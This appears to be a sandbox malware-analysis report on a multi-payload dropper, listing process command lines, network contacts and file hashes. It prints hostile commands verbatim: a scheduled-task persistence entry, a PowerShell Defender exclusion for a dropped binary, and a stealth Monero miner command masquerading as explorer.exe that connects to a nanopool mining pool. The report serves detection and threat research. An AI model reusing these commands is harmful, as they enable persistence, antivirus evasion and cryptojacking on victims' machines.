"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=4132,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3960 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=3236,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4268 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=disabled --field-trial-handle=4200,i,2136907768304775106,9034448157542481306,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3252 /prefetch:2
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS8B14.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc4eaa46f8,0x7ffc4eaa4708,0x7ffc4eaa4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1968 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5076 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1952,8000862606988025941,14789335571603988771,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3944 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 104.26.4.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 104.26.5.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 162.159.135.233:443 | cdn.discordapp.com | tcp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.5.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.74.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.135.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 172.67.74.161:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 3.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | prophefliloc.tumblr.com | udp |
| US | 74.114.154.18:443 | prophefliloc.tumblr.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| MD | 176.123.2.239:80 | 176.123.2.239 | tcp |
| N/A | 127.0.0.1:55740 | tcp | |
| N/A | 127.0.0.1:55742 | tcp | |
| US | 8.8.8.8:53 | 239.2.123.176.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | www.facebook.com | udp |
| US | 8.8.8.8:53 | secure.facebook.com | udp |
| GB | 157.240.214.13:443 | secure.facebook.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| GB | 157.240.221.35:443 | www.facebook.com | tcp |
| US | 8.8.8.8:53 | 150.16.251.13.in-addr.arpa | udp |
| GB | 157.240.221.35:443 | www.facebook.com | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.221.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | static.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | tcp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | udp |
| GB | 157.240.214.11:443 | static.xx.fbcdn.net | udp |
| US | 8.8.8.8:53 | 11.214.240.157.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 106.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | 208.5.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| FR | 51.210.150.92:14433 | xmr-eu2.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | 92.150.210.51.in-addr.arpa | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 162.19.224.121:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | 235.4.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.224.19.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 0182d7dcdb4e1d8c87ef13ccca528b16 |
| SHA1 | f0f3d321a0829992d81bba5460abad5c555439cd |
| SHA256 | 1f4d8c3b8625c3506e6907a4e50e2f43cd851cbde208af218e50a9994b35388b |
| SHA512 | f21c3d8792e805ef3aceaf294385c383e0db4964d36a51654f82b97a448349631a1b829e9602ca78e60caa89311d85a7b569636766521c9f2de167e28860beb9 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\setup_install.exe
| MD5 | aaaf685d045b423d4d96ecaca344b4d5 |
| SHA1 | f2264a40421e66029db1cdf7fe8bb8ada2614862 |
| SHA256 | f77fee8eef443261bc896ac6f10c099277a5fd31baa88f4fa171905157c5d6d8 |
| SHA512 | 8e01c8cf6623250050c099f2cb139aeac6b6318841d23d7701e6ceffc0dcdba79220533af1e84a34750ac7efc2d56750aeb9a5468ca12a12dab9ce2f1899ec4e |
memory/396-52-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-54-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/396-53-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\c862a054a35.exe
| MD5 | 0f3487e49d6f3a5c1846cd9eebc7e3fc |
| SHA1 | 17ba797b3d36960790e7b983c432f81ffb9df709 |
| SHA256 | fa64075d63724c29bd96e172b3a59c4db6bc80462f8d4408b0676436958a4f1a |
| SHA512 | fe5959d83d8d106675c8ca5ceb424648148ee812ce79f667b25439ef82bf2373fd08342b8d06e40c04e718209ef32a057804c80da0e3a7aac2d88f5ab29df37f |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e010.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\e4b2f18fb52218.exe
| MD5 | e2213d70937e476e7a778f1712912131 |
| SHA1 | f8f09b6965c83c361210a1b11c8039b7ca9a30b9 |
| SHA256 | 7312ff88c5eb0eb108cc0f04b91f871f59faed40d28cc5364ff456b0b063c37b |
| SHA512 | cd97ff1cf43462b05461c3c5b3c2efe6aea8645968eae89c1936cf0f2657a05bbdcced863e1b68049c4b4624387f2b1d265257d5ce154053ecd31a032a74611f |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\f34b9ab9db6d16.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\453c5fa76a849.exe
| MD5 | 46e9d76672b9d24ba14ea963574cc6a2 |
| SHA1 | caf88d470dc1241aca2b159b26953194a8d59cca |
| SHA256 | 2f21e720e8fd2c591fdd52d7267370a2f0894bb4d3ca564392271cc025102ba7 |
| SHA512 | 3e940ccdc588f0a284ce9c94106161845fb878c42db983b13fffbcac8c5620626ca58d745527309213716889546c4de4777c24f8c706dfe74ece7aa1772022c6 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\9aa6e16872.exe
| MD5 | 77c7866632ae874b545152466fce77ad |
| SHA1 | f48e76c8478a139ea77c03238a0499cfa1fc8cea |
| SHA256 | e3c9119e809a1240caaaf4b6d5420352f037cc2585cb321cb746f05ed0ec0e43 |
| SHA512 | e1b1fad94981b2aa9d0aeb5b7f6d93a2f7f4c8305b05ea89ad66c35c6556ff2333e861c70fcad6953991d6dcbeea3031fed1d5791d99806423056c1c8dcd9ad8 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\53516815d3135fe3.exe
| MD5 | 5c2e28dedae0e088fc1f9b50d7d28c12 |
| SHA1 | f521d9d8ae7381e3953ae5cf33b4b1b37f67a193 |
| SHA256 | 2261a3d740572f9d0ee42faad5b0d405df16506e104bd912e7c7b24d7fddcc5f |
| SHA512 | f6f100508acb77af5b3442673c9d01a6a16cc39521b618eebccd482bf9f50b3991109f82b97e48e8c3cc0221f0be9e164867ba79ac2f2bc4e25cbdb5f7daa15f |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\08240101651be7e1.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\1710990cbc64.exe
| MD5 | c0d18a829910babf695b4fdaea21a047 |
| SHA1 | 236a19746fe1a1063ebe077c8a0553566f92ef0f |
| SHA256 | 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98 |
| SHA512 | cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\4f5baa1083db067.exe
| MD5 | 7aaf005f77eea53dc227734db8d7090b |
| SHA1 | b6be1dde4cf73bbf0d47c9e07734e96b3442ed59 |
| SHA256 | a5f373f8bcfae3d9f4895c477206de63f66f08e66b413114cf2666bed798eb71 |
| SHA512 | 19dc8764c5347a73767caed67a8a3f2fe0ecb07cacf2f7b2a27a48592780dede684cfb52932695a79725a047f2c092b29a52b5fd0c7dc024a0166e6ada25633d |
memory/396-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-47-0x0000000064940000-0x0000000064959000-memory.dmp
memory/396-46-0x0000000064941000-0x000000006494F000-memory.dmp
memory/396-45-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/396-44-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/396-43-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/396-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
memory/396-50-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-49-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-48-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/396-41-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS406A34B7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/1004-114-0x0000000000DA0000-0x0000000000DCC000-memory.dmp
memory/1452-103-0x0000000000970000-0x0000000000978000-memory.dmp
memory/1004-116-0x0000000001580000-0x0000000001586000-memory.dmp
memory/2708-117-0x0000000000070000-0x000000000015E000-memory.dmp
memory/4464-118-0x0000000000A10000-0x0000000000B52000-memory.dmp
memory/1004-120-0x0000000001590000-0x00000000015B0000-memory.dmp
memory/4464-122-0x0000000005450000-0x00000000054E2000-memory.dmp
memory/4464-121-0x0000000005920000-0x0000000005EC4000-memory.dmp
memory/1004-123-0x00000000015B0000-0x00000000015B6000-memory.dmp
memory/4464-125-0x0000000005770000-0x000000000580C000-memory.dmp
memory/4464-124-0x0000000005410000-0x000000000541A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
| MD5 | ad0aca1934f02768fd5fedaf4d9762a3 |
| SHA1 | 0e5b8372015d81200c4eff22823e854d0030f305 |
| SHA256 | dc10f50f9761f6fbafe665e75a331b2048a285b1857ad95e0611ace825cba388 |
